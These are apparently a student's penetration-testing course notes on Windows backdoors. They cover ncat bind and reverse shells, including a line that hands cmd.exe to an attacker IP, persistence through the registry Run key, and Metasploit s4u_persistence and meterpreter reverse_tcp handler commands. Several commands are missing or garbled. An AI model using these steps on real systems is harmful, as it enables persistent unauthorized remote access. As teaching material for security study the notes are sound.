Notes regarding Sys. Attacks from ePTS course + other recourses.
Classification:
🚪Backdoor
Ncat
install it in the victim machine and run it with these commands:
-l listen -e: excute file we choose cmd so we can excute commands.
attacker will
can also be executed as a reverse listener especially when the target is on another network:
in the Attacker machine listen:
-v: for verbose give us output.
in the target machine:
Persistent Backdoor:
in windows Register Editor in `HKEY_LOCALMACHINE\SOFTWARE\Microsoft\CurrentVersion\Run` we add string value for our ncat (or whatever we name it in the target machine) add command to run :
then restart the victim machine.
as soon as they logged in the attacker who's listening will et a shell.
Metasploit
using the Meterpreter (which's just like ncat above but with steroids).
Meterpreter: is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.
Get persistence in target machine:
after hacking one machine you will have already a session that you can browse with sessions command:
which's the path to ncat (here it's re-named as winconfig) {Attacker_IP} {Port} -e cmd.exe
use exploit/windows/loca/s4u_persistence
sessions //see all the sessions you have
set session <ID> //pick session to stay persistent
set trigger logon //whenever target login you will have conn
set payload windows/meterpreter/reverse_tcp //whatever payload
//same as the attack you used to gain access from first place and gett ths session
set lhost <your_IP>
set lport <open_Port>
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
exploit
